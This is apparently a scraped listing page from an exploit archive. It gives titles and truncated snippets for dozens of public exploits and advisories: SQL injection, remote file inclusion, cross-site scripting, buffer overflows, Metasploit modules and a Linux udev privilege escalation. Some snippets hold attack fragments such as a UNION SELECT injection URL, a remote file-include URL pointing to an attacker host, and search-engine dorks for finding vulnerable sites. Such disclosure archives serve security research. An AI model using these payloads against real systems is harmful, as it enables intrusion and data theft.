PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl 0-Day PunBB = 1.3. Package: PunPM = v1.2.6 Remote Blind SQL Injection Exploit Author/s: Dante90, WaRWolFz Crew Created: 2009.07.30 after 0 days the bug was discovered. Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero,...

CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13259/info CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script...

RarCrack 0.2 - "filename" init() .bss PoC

No description provided by source. The software can be downloaded here: http://rarcrack.sourceforge.net/ Author: stoke Date: 2010-09-20 Download: http://rarcrack.sourceforge.net/ Tested on: Backtrack 4 Site: http://devilcode.it | http://hack2web.altervista.org Special greetz to: nex, for reassure...

joomla Component com_pcchess Local File Inclusion

No description provided by source. ================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == ==...

ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit

No description provided by source. ----------------------------Information------------------------------------------------ +Name :ilchClan = 1.0.5B SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +email : [email protected] +Date : 15.04.2010 +Script : ilchClan = 1.0.5B...

DigitalHive Multiple Vulnerabilities

No description provided by source...

PMachine Pro 2.4 - Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/12597/info PMachine Pro is reported prone to a remote file include vulnerability. This issue affects the 'mailautocheck.php' script. An attacker may leverage this issue to execute arbitrary server-side script code on an...

IBM Lotus Domino Web Access Upload Module Buffer Overflow

No description provided by source. $Id: ibmlotusdominodwauploadmodule.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensin...

Ananta Gazelle CMS - Update Statement SQL Injection

No description provided by source. Exploit Title: Ananta Gazelle CMS - Update Statement Sql injection Google Dork: - Date: 07-02-2012 Author: hackme Software Link: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/AnantaGazelle1.0.zip/ Version: 1.0 stable Tested on: backbox 2...

Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1986/info Resin is a servlet and JSP engine that supports java and javascript. ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent...

2daybiz Freelance Script SQL Injection Vulnerability Exploit

No description provided by source. ----------------------------Information------------------------------------------------ +Autor : Easy Laster +ICQ : 11-051-551 +Info : http://www.2daybiz.com/freelancescript.html +Discovered by Easy Laster 4004-security-project.com +Security Group...

WordPress LeagueManager Plugin 3.8 - SQL Injection

No description provided by source. !/usr/bin/ruby Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection Google Dork: inurl:/wp-content/plugins/leaguemanager/ Date: 13/03/13 Exploit Author: Joshua Reynolds Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ Software Link...

Web Wiz Forum 6.34/7.0/7.5 Unauthorized Private Forum Access Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8957/info A vulnerability has been reported in Web Wiz Forum that could allow unauthorized access to private forums. The problem occurs when handling malformed requests that make use of 'quote' mode. When this mode is use...

Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/11612/info ScanMail for Domino is reported prone to a vulnerability that may allow sensitive configuration files to be disclosed to remote attackers. A successful attack may allow an attacker to disclose sensitive...

HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2245/info Certain versions of HP JetDirect enabled printers provide a function PJL command that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using thi...

simple web-server 1.2 - Directory Traversal

No description provided by source. ------------------------------------------------------------------------ Software................Simple web-server 1.2 Vulnerability...........Directory Traversal Threat Level............Serious 3/5 Download................http://www.storecalc.com Discovery...

MidiCart PHP Search_List.PHP SearchString Parameter Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13516/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...

Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distribut...

Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php

No description provided by source. ----------------------------Information------------------------------------------------ +Name : Preisschlacht Multi Liveshop System SQL Injection seite&aid index.php +Autor : Easy Laster +Date : 17.03.2010 +Script : Preisschlacht Multi Liveshop System +Download ...

Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10746/info Kleinanzeigen is prone to a file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. If successful, the...

Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (3)

No description provided by source. source: http://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distribut...

Heaven Soft CMS 4.7 - SQL Injection Vulnerability

No description provided by source. x Tybe: SQL Injection Vulnerabilities x Vendor: http://www.newyorkindoorcricket.com/ x Script Name: Heaven Soft, CMS Version: 4.7 x author: PrinceofHacking x Team: Ashiyane Digital Security Team x Mail : PrincedotH4ck@gmaildotcom D0rk:photogalleryshow.php?id...

Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13510/info Oracle 9i/10g Database is prone to a logging failure vulnerability that exists in Fine Grained Audit FGA functionality. Reports indicate that FGA may be disabled inadvertently, without notifying the database...

Easy Online Shop SQL Injection Vulnerability

No description provided by source. ----------------------------Information------------------------------------------------ +Name : Easy Online Shop = SQL injection Vulnerability Proof of Concept +Autor : Easy Laster +Date : 17.12.2010 +Script : Easy Online Shop +Vendor : http://www.mhproducts.de/...

mygamingladder MGL Combo System <= 7.5 - SQL Injection

No description provided by source. ----------------------------Information------------------------------------------------ +Name : mygamingladder MGL Combo System = 7.5 SQL injection Vulnerability & SQL injection Exploit +Autor : Easy Laster +Date : 10.04.2010 +Script : mygamingladder MGL Combo...

BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability

No description provided by source. BtiTracker/xBtiTracker Remote SQL Injection Vulnerability Author: InATeam http://inattack.ru/ Affected versions: BtiTracker = 1.4.7, xBtiTracker = 2.0.542 Software site: http://www.btiteam.org/...

BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability

No description provided by source. BtiTracker =v1.4.1 Remote SQL Injection Exploit Discovered by: m@ge|ozz - [email protected] Vulnerabitity: Remote Sql Injection / Problem: Any user can be Administrator Website Vendor: http://www.btiteam.org Vulnerable Code accountchange.php: if isset$GETstyle...

I-RATER Platinum Common.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...

Boat Classifieds SQL Injection Vulnerability

No description provided by source. Boat Classifieds Category: Boat Classifieds SQL Injection Vulnerability Download: http://www.site2nite.com/boat-webdesign.asp Author: Sangteamtham at hcegroupdotnet Homepage: HCE group.net Exploit: http://server/detail.asp?ID=999999 union select...

PHP-Nuke <= 8.0 - Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl 0-Day PHP-Nuke = 8.0 News Remote SQL Injection Exploit Created: 2010.04.23 after 3 days the bug was discovered. Author/s: Dante90 & The:Paradox, WaRWolFz Crew Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shade...

Joomla Component simpledownload 0.9.5 - Local File Disclosure

No description provided by source. !==========================================! Joomla Component simpledownload Remote File Disclouse Author : altbta [email protected] Homepage : v4-team.com & xp10.me Date : 16 Mei, 2010 !==========================================! Software Information + Vendor :...

DevelopItEasy Events Calendar 1.2 - Multiple SQL Injection Vulnerabilities

No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...

Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow

No description provided by source. $Id: integardpasswordbof.rb 11344 2010-12-15 19:49:40Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and term...

MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry BOF

No description provided by source. html object classid='clsid:3A86F1F2-4921-4C75-AF2C-A1AA241E12BA' id='target'/object script language='vbscript' 'Magneto Software ICMP ActiveX Control Buffer Overflow 'Discovered by: s4squatch 'website: www.securestate.com 'Date Discovered: 03/11/09 'Exploit...

Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit

No description provided by source. !/bin/bash Gazelle CMS 1.0 Multiple Vulnerabilities Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download Found by whitesheep on 11/08/2009 Contact: [email protected] - https://www.ihteam.net Need magicquotegpc Off for RCE and LFI...

XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit

No description provided by source. html head titleXOOPS Module WF-Snippets = 1.02 c BLIND SQL Injection Exploit/title script type=text/javascript //'=============================================================================================== //'Script Name: XOOPS Module WF-Snippets = 1.02 c...

PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the...

PHP Uploader Downloader 2.0 - Upload Shell Vulnerability

No description provided by source. ======================================================================================== | Title : PHP Uploader Downloader Upload Shell Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi -...

w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qwPOST; use Getopt::Long; '/ -.- ------------------oOO------OOo----------------- | | | / / / / | | / / / / / / / / / / / | | // // / / / // / // / // | | ///,// /./,/, // | | Security Research...

PHPope <= 1.0.0 - Multiple Remote File Inclusion Vulnerabilities

No description provided by source. x PHPope = 1.0.0 Multiple Remote File Include Vulnerability ! Download Script : http://sourceforge.net/projects/phpope/files/ ! Author : cr4wl3r ! Contact : cr4wl3r4tlinuxmaildotorg ! Location : Gorontalo - INDONESIA ! Dork : FuCk y0u MaLaYsia x 3xplo!t :...

RoundCube Webmail Multiple Vulerabilities

No description provided by source. Exploit Title: RoundCube Webmail XSS Voulerability Date: 6.01.2010 Author: j4ck & Globus from elitehackers.pl Software Link: Software link : http://roundcube.net/download Version: 0.2.X , | possible voulerability in higher versions. Tested on: Code : XSS:...

Sun Java Web Start Plugin Command Line Argument Injection (2012)

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

GTX CMS 2013 Optima - SQL Injection

No description provided by source. Document Title: =============== GTX CMS 2013 Optima - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1124 Release Date: ============= 2013-10-29 Vulnerability Laboratory ID VL-ID:...

GameHouse dldisplay ActiveX control 0,Real Server 7.0 Port 7070 DoS

No description provided by source. source: http://www.securityfocus.com/bid/1128/info Sending malformed packets to port 7070 will cause Real Server to stop responding. Restarting the server will be required in order to re-establish normal functionality. http://www.exploit-db.com/sploits/19856-1.e...

Wolf CMS 0.7.5 - Multiple Vulnerabilities

No description provided by source. Title: ====== Wolf CMS v0.7.5 - Multiple Web Vulnerabilities Date: ===== 2012-02-27 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=452 VL-ID: ===== 452 Introduction: ============= Wolf CMS is a content management system and is Free...

phpInstantGallery 2.0 - index.php gallery Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/29152/info phpInstantGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in t...

MTCMS <= 2.0 (admin/admin_settings.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl +------------------------------------------------------------------------------------------- + MTCMS = 2.0 admin/adminsettings.php Remote File Include Exploit...

ablespace 1.0 (xss/bsql) Multiple Vulnerabilities

No description provided by source. riginal advisory: http://dsecrg.com/pages/vul/show.php?id=137 Digital Security Research Group DSecRG Advisory DSECRG-09-037 Application: AbleSpace Versions Affected: 1.0 Vendor URL: http://abk-soft.com/ Bugs: Multiple Blind SQL Injections, Multiple XSS Exploits:...

Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit

No description provided by source. / cve-2009-1185.c udev 141 Local Privilege Escalation Exploit Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 udev before 1.4.1 does not verify whether a NETLINK message originates...

dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability

No description provided by source. Credits : h4ntu Title : dotProject = 2.0.3 Remote File Inclusion URL : http://www.dotproject.net/ Exploit : http://target.com/dotProjectpath/includes/dbadodb.php?baseDir=attacker milw0rm.com 2006-06-20...